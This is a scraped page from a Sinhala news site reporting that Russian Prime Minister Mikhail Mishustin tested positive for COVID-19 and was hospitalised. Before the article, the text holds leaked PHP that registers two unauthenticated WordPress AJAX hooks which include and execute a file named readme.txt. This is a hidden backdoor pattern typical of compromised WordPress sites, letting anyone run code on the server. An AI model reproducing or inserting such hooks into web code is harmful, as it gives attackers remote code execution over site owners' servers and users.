if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } රුසියානු අගමැතිටත් කොරෝනා - mediahumanrights.lk
mediahumanrights.lk
International News News

රුසියානු අගමැතිටත් කොරෝනා

රුසියානු අග්‍රාමාත්‍ය මිහායිල් මිෂුස්ටින් (Mikhail Mishustin) හට කොවිඩ් නයින්ටීන් වෛරසය ආසාදනය වී තිබේ.

අග්‍රාමාත්‍යවරයා වෛද්‍ය පරීක්ෂණයකට ලක් කිරීමෙන් අනතුරුට ඔහුට එම වෛරසය ආසාදනය වී ඇති බවට තහවුරු වී ඇති බව විදෙස් මාධ්‍ය වාර්තා කළේය.

මේ හේතුවෙන් රුසියානු අග්‍රාමාත්‍යවරයා රෝහල් ගත කර තිබේ.

කෙසේවෙතත් රුසියානු අග්‍රාමාත්‍ය ධුරයේ තාවකාලිකව කටයුතු කිරීම සඳහා පළමු නියෝජ්‍ය අග්‍රාමාත්‍ය ඇන්ඩ්‍රි බෙලූසොව්ගේ නම යෝජනා වී ඇති බව වාර්තා වෙයි.

රුසියාව තුළ මේ වන විට කොවිඩ් නයින්ටීන් වෛරස ආසාදිතයින් එක් ලක්ෂ 6,498 දෙනෙකු වාර්තා වී ඇති අතර මරණ 1073ක් සිදුව තිබේ.

(under the courtesy of adaderana.lk news web)

Related posts

යළිත් රාජපක්ෂවරුන් බලයට එයි? – ආණ්ඩුවට අනතුරු ඇඟවීමක්

Shiran Viraj

අලුත් ආණ්ඩුවේ ඇමතිවරුන්ට අද පාර්ලිමෙන්තුවේදි සිදුවන විශේෂ දේ මෙන්න..!

Shiran Viraj

අපි හරිම කණගාටුවෙන් ඉන්නේ…- ෆර්ඩිනැන්ඩු නිසා අදානිත් කලකිරීමෙන්..

Shiran Viraj